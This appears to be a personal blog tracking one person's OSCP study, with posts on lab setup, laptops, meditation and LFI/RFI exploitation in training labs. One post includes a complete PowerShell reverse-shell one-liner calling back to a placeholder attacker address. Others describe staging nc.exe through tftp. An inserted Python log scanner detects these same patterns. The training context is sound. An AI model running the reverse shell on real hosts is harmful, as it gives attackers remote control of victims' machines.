RCE using RFI attacks

Now that I have finished tackling LFI attacks, I am moving on to try to do a similar exploit, but rather than executing something from the victim machine, I will execute from my computer (the attacking machine) – hence “Remote File Inclusion” attacks, or RFI attacks.

I seem to be having some trouble with this one, and I am ultimately going to pause on this and rethink it. My first thought was to serve php-reverse-shell from pentestmonkey from my machine, but it didn’t work.

I then backed up and asked myself whether the shell was working at all. So I decided to just upload the script to my victim machine and see if I could get a reverse shell. Well, my Windows victim machine is super old, and HTTP caching wasn’t even letting me download the reverse shell to the machine over 80. I tried tftp, and nada. I finally zipped the script and downloaded the .zip file.

Then I went ahead and unzipped on my victim machine and tried it. It would connect over netcat but then close the connection. So yeah, that’s not working. Honestly, at this point, I don’t even think that I should be downloading outside scripts to get the labs to work. So I am going to back up again, think about having nc.exe served from my machine, and execute a command to that executable. Then at least I can move on with the labs.

I do think there is value to getting the php-reverse-shell from pentestmonkey working though – it would be super valuable when I start popping boxes.

RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion (LFI) attacks. I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL, and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.
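Turning the attack path described in these two posts around to the defender's side, the Python below is an added example (mine, not the author's code) that scans Apache-style access log lines for the three things the posts describe: a remote URL handed to an include parameter (RFI), directory traversal in a file parameter (LFI), and a tftp, nc.exe or powershell token in a parameter value. The log lines, IP addresses and rule names are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache-style access log lines (not real traffic from the post): line 2 is a
# remote include (RFI), lines 3-4 use traversal (LFI), line 4 also fetches nc.exe via tftp.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Mar/2019:03:41:02 -0400] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [17/Mar/2019:03:41:10 -0400] "GET /index.php?page=http://10.0.0.9/shell.txt HTTP/1.1" 200 88
10.0.0.9 - - [17/Mar/2019:03:42:31 -0400] "GET /index.php?page=..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 301
10.0.0.9 - - [17/Mar/2019:03:44:07 -0400] "GET /index.php?page=..%2f..%2fboot.ini&cmd=tftp+-i+10.0.0.9+GET+nc.exe HTTP/1.1" 200 1024
10.0.0.5 - - [17/Mar/2019:03:45:00 -0400] "GET /static/logo.png HTTP/1.1" 200 4090
"""

# Common log format: client ip, identd, user, [timestamp], "METHOD target PROTO", ...
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# Each rule runs against a fully URL-decoded query parameter value.
RULES = [
    ("rfi_remote_url", re.compile(r'^(https?|ftp)://', re.I)),                # include from another host
    ("lfi_traversal", re.compile(r'\.\.(/|\\)')),                              # ../ or ..\ in a path
    ("rce_tool_fetch", re.compile(r'\b(tftp|nc\.exe|powershell)\b', re.I)),   # staging or running a shell
]

def decode(value: str) -> str:
    """Percent-decode repeatedly so double-encoded evasions such as ..%252f are unmasked."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value

def inspect_line(line: str):
    """Return [(ip, parameter, [rule names])] for one log line, or None when nothing matched."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    hits = []
    for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        matched = [rule for rule, pat in RULES if pat.search(decode(value))]
        if matched:
            hits.append((m.group("ip"), name, matched))
    return hits or None

def scan(log_text: str):
    """Run every line of an access log through the rules and collect all findings."""
    findings = []
    for line in log_text.splitlines():
        findings.extend(inspect_line(line) or [])
    return findings
```

Calling scan(SAMPLE_LOG) flags the three requests from 10.0.0.9 and ignores the two benign ones; feeding it a real access log only requires reading the file into the string.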

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.


…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of the things they say in the exercise is a Lincoln quote – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. 🙂

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!

Day 53 of the OSCP!!

I am slow – like really slow. I got through the enumeration section of the book pretty steadily, but now that I am working on Buffer Overflows, things are going slow and I am not as “quick” to pick back up the book.

I wake up at 4 am every day eager to study. After checking emails and reddit, I get in and make a little bit of progress. I really have to start putting more of my heart into this or else this OSCP is going to drag…

People take the test, what, like three times before they pass? I really need to get more wrapped in it, or this is going to be a really long process. I think I am going to buy 90 more days of lab to finish out the book, and then just go nuts on studying through hackthebox.eu and vulnhub. Take the test at the latest I can take it, and then if I fail, maybe 30 more days of lab and studying and then take it again.

I have a baby boy due in July so, yeah…. life happens, but it has always been my passion to pass this cert. I got this. Wish me luck.

15 days into to the OSCP and I am tired…

Hi everyone. I don’t think I officially started blogging about my OSCP journey. So, here, 15 days in and I am blogging while my latest PWK VM is being copied from C:/ to my NAS.

I have about 9 years of managerial cybersecurity experience under my belt, and as you can see from my earlier posts, I have been working for about 6 months getting prepped for my OSCP jump. I was working through Georgia Weidman’s book, Penetration Testing: A Hands-On Introduction to Hacking, and got frustrated at Cybrary for a hot one (some of the basic modules have flaws, not to mention I would get kicked off the penetration testing pro track pretty much every week, and had to wait till Cybrary was back from the weekend to get sorted out). I thought about going back and doing my CE|H v10 but decided (thanks to my wife) that I should just go for the OSCP.

I was able to convince my work to flip the bill for 90 days of the lab and the materials, and whee! Here we go, into the rabbit hole. I have been scraping the web on people’s thoughts/preparation on the OSCP and shit myself in the process because this is a deep journey, and everyone is different, so I have to stop reading and just start moving.

Week 1: Got the monstrous course book, and the videos. Backed them up like three times since there is a fine for losing them and asking for them again. Worked verbatim through the videos, racking up some shell scripts and python on my PWK VM, and then realized that if I go through the book, document all relevant exercises, pwn 10 machines, write up a report, and PDF it to Offensive Security, I would get 5 bonus points on my OSCP score. Some people say it’s not worth it, but I think it’s an awesome way to study and practice for the real deal, so I dropped doing the videos and started moving through the book.

Week 2: I am one slow man. I did manage to setup my PWK VM a bit better, realizing that terminator is the way to go, along with using OneNote to record my lab exercises and notes. I am three chapters out of 18 to go. I have a strange feeling that I will be asking for more lab time.

So, today I mounted an empty folder over my root folder in my PWK VM image. I am not a smart man. I can’t stress how glad I was for using OneNote online to backup my notes and exercises. Backup, backup, backup. The VMWare tools aren’t really working (at the moment) with the PWK VM, but after I messed everything up, I followed this chap’s thoughts on bridging a folder between the VM and the host, with the host folder backing up to the cloud. I chose OneDrive since my OneNote online notebook for my notes and exercises was going there, and the Surface Laptop I am using is so friggen integrated with OneDrive that I get that folder structure on my laptop mixed up with the simple core folders I have locally all the time. Moving forward, I see no reason not to back up my entire VM when I make changes to it.

Currently 6pm on 12/29/2018. I aim to get through a good portion of chapter 4 tomorrow. Remember, it’s an OSCP journey. I am so passionate about this stuff, and with time, I think I can rock this. I just need to be smart, and honestly, move a bit faster.

I love meditation 👁️❤️🧘

Merry Christmas interwebs! Well, one day late, but still – and keep in mind that is the Catholic Christmas, not the Orthodox Christmas, which we will celebrate with my wife’s family on January 7th, 2019. So merry in-between Christmas???

There are a few things I love, and meditation is one of them. I can’t highlight how amazing it is – and with apps like Headspace, you really can’t go wrong. There is so much importance in the need for us to appreciate the present. I think when we train our minds on being present and aware, we appreciate life and the people around us. I am currently working through Headspace on their Kindness pack, but there are so many different types of packs, from mindful eating to taking a walk in the park.

I am on day 11 of my OSCP, and the more I read about the test and what it involves, the more I realize that 90 days may get me to where I need, but I have to study. So my goal is 3 hours/day weekdays, 6-8 hours/day weekends. I think if I just invest the time and energy, it’s possible. The OSCP is becoming the de-facto standard in Pen Testing, and I really want to get it. It would be such a confidence lifter for me.

Happy Wednesday, and press on.

Finally landed on the Surface Laptop 2

Well, the Matebook X Pro didn’t fare well with a dual boot of Kali and Windows. I think it had something to do with the weird 3000×2000 resolution and the fact that grub couldn’t understand that to boot into an installer for Kali. I tried working on different grub commands, but eh, I did so much that I couldn’t get the machine to boot back into the original install.

So I took it back to the store and decided VM only – no dual booting. I mean, OSCP is set up to work within a VM, and all my practice books are with VMs. So VM it is – and I need a good supported VM app, so Windows with VMWare Workstation was the way to go. I also wanted a laptop that will last, so I put up the extra cash for the new Surface Laptop 2. I am happy so far. I do wish it had a USB-C as the MXP did, but it wasn’t a deal breaker. Back to studying!

Happy Monday!

Currently listening to Desi, waiting for my new USB stick to finish a slow format. So I have been using my wife’s computer to start prepping for the OSCP, and I have to say, that was a bad idea. I have a Mac, but trying to create my own virtual lab in there has been rough. I used VirtualBox to do this, but VMWare Workstation on a Windows machine just seems to get the job done right.

So, my first thought was to go with a souped-up Chromebook. I went ahead and got the i7 Pixelbook. Nice looking machine, and yes, I think ChromeOS is nice – but I wanted to run Linux off of it. So I went two different routes on this, and neither worked like I needed it to.

Route 1: I changed my channel to the developer channel and just used the Crostini Linux that Google offered from this channel. It wasn’t a full blown Linux like I needed. So scratch that.

Route 2: I put the Pixelbook in developer mode, and ran chroots of Linux. After some crazy finagling, I got kali-rolling on an xfce desktop. But, still limited – for example, I couldn’t do any networking – this was just a virtual container running on ChromeOS.

I didn’t try wiping the OS and just installing a Linux on metal, mainly because I was afraid that doing that would lock me into not being able to return the machine. After not being able to successfully do either of the above routes, I put the machine back on the stable channel, main mode, and powerwashed it.

I haven’t gotten my $ back (it’s still in the mail), but I need a machine that is not my wife’s. Some googling commenced, and I settled on a Matebook X Pro (MXP). I think it’s the best bang for your buck. I almost bought a Surface Book 2, but it was clunky, and $1K more. I don’t really need a 2-in-1. The only thing about the MXP is the resolution is a bit wack. It works, but it’s like 3000×2000 – and then you have to increase the font size. So far, ok, but some of my older VMs (Windows 7, XP, Ubuntu) are hard to see/really small. But the ports, the size, and the power of the computer I really like. I am a bit concerned about the build – Chinese products sometimes don’t last as long, and I am hoping this will take me 5 years out. But I hope that I am done with my OSCP by that time, and it might be time for a new PC, based on what I learned.

I am going to set up a dual boot of Kali and Windows. The drive is a 512MB SSD and so far, all is well, except for the heat – the computer does come with a 1 year warranty, so I am going to lean on that if something doesn’t go well.

Greetings from Cambridge.

I am writing to you from Cambridge – my sister in law is a freshman here at Harvard, and it’s parents’ weekend. Here’s a pic of her and my daughter 🙂 I had an opportunity to step into CS 50, which is the largest core computer science class that Harvard has to offer. It was awesome. The teacher was animated, clear, and descriptive. I want to come to Harvard and get a CS degree now!

Here, they are introducing databases. The one thing I love about Harvard is the inspiration it brings – which leads me to my Bsides event, which was awesome. I learned a lot from the CTF, and I need to learn more.

I got to the game late, so I didn’t understand the team’s strategy. Hell, I didn’t even understand the board. But a few reddit posts later, I think I am good to go for my next one. I think I am going to play some CTFs online.

Oh, and work approved my OSCP tuition – so it’s on.

My first Pros Vs. Joes!

So BsidesDC is this weekend, and honestly, I am really not sure why the ham sandwich I haven’t been to the conference all these years. I am really trying to focus on getting back into the technical realm, and conferences like this have some great presentations, speakers, and just interesting people – so yah, I am going. It’s gonna be f&*#@ fantastic. And then, just today, I got invited by @malwaremama to participate in @dichotomy1‘s ProsVsJoes event. Hell’s bells son. Better firm up those whitelists and start closing down unnecessary ports, it’s gonna get crazy. Here’s my checklist:

For now, a bit of reading, and a good time will be had by all 🙂